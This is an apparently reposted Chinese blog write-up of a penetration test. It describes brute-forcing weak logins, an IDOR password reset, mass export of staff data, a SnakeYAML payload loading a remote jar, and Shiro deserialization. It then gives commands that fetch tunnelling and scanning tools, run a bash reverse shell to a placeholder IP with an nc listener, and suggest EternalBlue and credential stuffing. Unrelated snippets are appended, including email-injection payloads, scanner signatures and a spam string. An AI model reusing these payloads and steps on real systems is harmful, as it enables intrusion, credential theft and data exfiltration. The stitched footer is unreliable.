<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    某次項目練手記錄

    VSole2023-08-30 09:07:22

    題記

    最近做了一個項目,復盤以后感覺大佬就是大佬,比不了比不了。

    我的思路

    目標有3天半時間,半天信息收集,1天打外網,2天內網。首先通過收集到的信息通過脆弱點找內網突破口,找到突破口對內網進行測試。

    Web端找入侵點

    在外網發現OA系統與一個物業管理系統綁在一個ip地址上。在物業管理系統發現登陸賬戶上用戶名寫在頁面上。

    通過爆破發現存在弱口令,進入后臺。

    Getshell失敗,放棄,好吧,是因為這個站太卡了,頁面定時刷新,太惡心。

    轉到OA系統,通過爆破,成功爆破出一個賬戶,進入OA。進入OA后有一些好處,一個是有很多關聯系統直接進入使用,另一個是可以獲取OA里所有用戶的信息對其他系統爆破,還有一個是翻閱OA里文件發現一些系統與一些默認密碼,更甚者可以翻到vpn等信息。

    通過OA可直接訪問金蝶系統,郵箱系統。

    在OA通過翻閱文檔發現是共享采購平臺用員工名字(在OA導出員工信息,把中文名用在線工具轉成拼音)縮寫,爆破,爆破出弱口令。

    且此平臺存在任意文件下載,下載到Linux密碼文件。

    Getshell點找找,都沒找到,他們系統有一個特點,能傳木馬但是不解析,后續拿權發現目標網站全部都是jar包起的站點,是不能通過上傳webshell提權的,只能內存馬或者命令執行反彈shell。

    后續外網又爆破了一堆后臺,這里不一一列舉了。下面寫兩個其他系統。

    1、工廠管理系統(若依二開)

    通過爆破拿到普通用戶權限,在修改個人資料處發現越權漏洞。可以遍歷所有用戶信息,于是猜想修改密碼處有越權。


    成功越權修改密碼,他對原密碼并沒有效驗。使用管理員登錄后臺發現1萬多信息,把運維人員,管理層人員,承運商信息,開發人員信息全部導出用于后續攻擊。

    本來想利用定時任務反彈shell的,經測試失敗,他的定時任務沒有填字符串的地方。


    org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://xxx/payload-v2.jar"]]]]')
    

    2、人事系統

    前面拿到人事系統人員信息,利用拿到的信息定向爆破(使用工號登錄后臺),成功爆破出hr后臺密碼,拿到全部人員信息。

    外網進內網的點

    目標大量使用若依框架二開的站點,眾所周知,若依使用了shiro的框架。所以他外網存在3,4個shiro反序列化漏洞。

    這里我是利用一個上傳nps代理進內網,一個上傳fscan進行掃描,一個windows上線cs抓系統密碼,瀏覽器密碼。

    1、上傳nps代理進內網

    mkdir ../test
    

    本來我想用ew正向代理進去的,后來發現我不知道他的ip,這時候才知道大佬們為啥喜歡用nps,確實方便管理。


    wget -P ../test http://xxx/ew_linux_x64chmod 777 ../test/ew_linux_x64../test/ew_linux_x64 -s ssocksd -l 9000
    

    運行nps:

    wget -P ../test http://ip/linux_amd64_client.tar.gztar -zxvf ../test/linux_amd64_client.tar.gz -C ../test../test/npc -server=ip:8024 -vkey=4z4oardkqdtu4ro6 -type=tcp
    

    2、反彈shell

    shiro拿到權限之后,經測試echo 'bash -i >& /dev/tcp/ip/7778 0>&1' > ../test/1.sh是不行的。最優解是先寫好1.sh,然后控制肉雞遠程下載1.sh。


    Vps監聽端口:nc -nlvp 7778wget -P ../test http://xxx/1.sh../test/1.sh
    

    上傳fscan到目標上,本地掛代理掃會出各種各樣問題。

    wget -P ../test http://xxx/fscan_amd64../test/fscan_amd64 -h ip/16 -p 80 -np -nopoc -o b.txt
    

    先探測存活的網段。


    ../test/fscan_amd64 -hf ip.txt -np -nopoc -o ip-c.txt
    


    漏洞挖掘。

    3、windows上線cs抓系統密碼,瀏覽器密碼。

    翻到一些系統的管理員密碼。登錄后臺。

    內網橫向

    因為時間太短,內網我的成果不是很多。下面主要記錄內網經常要用到的思路。


    內網資產搜集;多關注windows系統,可以用永恒之藍滲透;關注nacos、vmware等可控制大部分主機的系統;利用漏洞獲取數據庫,系統密碼,然后利用密碼對跑出的22,3306,1433,445等端口進行密碼撞庫。
    

    大佬思路

    1、重點找運維人員的信息。

    其他技術問題

    1、拿到服務器權限發現是jar包起的web站點。

    這時候可以吧jar包復制到其他目錄,然后后綴改成zip,解壓后就可以拿到配置文件,翻數據庫密碼。

    test
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    AV-TEST 和 AV-Comparatives 是兩家知名的反惡意軟件評估公司。盡管久負盛名,但是前者遇到了一件尷尬的事情:官方 Twitter 賬號于 7 月 25 日被黑了,但時間過去 1 周仍未恢復對其的控制。
    前不久,國際權威測評機構AV-TEST發布了最新的企業安全產品測評結果,在測評的19個企業級終端安全產品中,深信服EDR在檢測能力、性能消耗以及可用性三個評估維度拿到了全部滿分(6分為滿分)的好成績,也是國內首個全部滿分的終端安全產品,意味著深信服EDR在終端安全防護能力上獲得了的專業肯定與認可。
    AV-TEST統計數據顯示,2022年在Windows平臺上發現了近 7000 萬個新的惡意軟件樣本;macOS 上只有大約 1.2 萬個惡意軟件。
    編寫測試代碼和編寫普通的Go代碼過程是類似的,并不需要學習新的語法、規則或工具。go test命令是一個按照一定約定和組織的測試代碼的驅動程序。
    主要測試思路xss:test+()@example.com. Header注入"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com. "recipient@test.com>\r\nRCPT TO:test.com
    它通過解壓縮 APK 并應用一系列規則來檢測這些漏洞來做到這一點https://github.com/SUPERAndroidAnalyzer/super9、AndroBugs 框架是一種高效的 Android 漏洞掃描程序,可幫助開發人員或黑客發現 Android 應用程序中的潛在安全漏洞。它可以修改任何主進程的代碼,不管是用Java還是C/C++編寫的。
    在整個軟件開發生命周期中,可以在開發與測試階段中使用IAST工具。之后啟動tomcat,查看agent是否正常上線。再看一下請求信息,通過請求信息找一下代碼入口,入口是在DocController.java的deleteDoc方法中。529行調用deleteDoc,跟入deleteDoc函數。deleteRealDoc中直接對原始請求參數進行拼接,完成文件刪除,觸發漏洞。通過數據流圖也可以初步判斷漏洞是否存在,假如通過修改傳入的污點值可以在最后危險函數處進行漏洞觸發,即可認為是存在漏洞的。
    位于德國的IT安全研究機構AV-TEST發布了針對Windows 10家庭用戶的2021年10月最佳殺毒程序評估報告。
    |常見掃描器特征
    2021-10-28 07:42:24
    by_wvs. acunetix. acunetix_wvs. acunetix_test. headersAcunetix-Aspect-Password:. Cookie: acunetixCookie. Cookie: acunetix.
    常見掃描器特征
    2021-10-25 04:13:52
    url acunetix-wvs-test-for-some-inexistent-file by_wvs acunetix_wvs_security_test acunetix acunetix_wvs acunetix_test
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类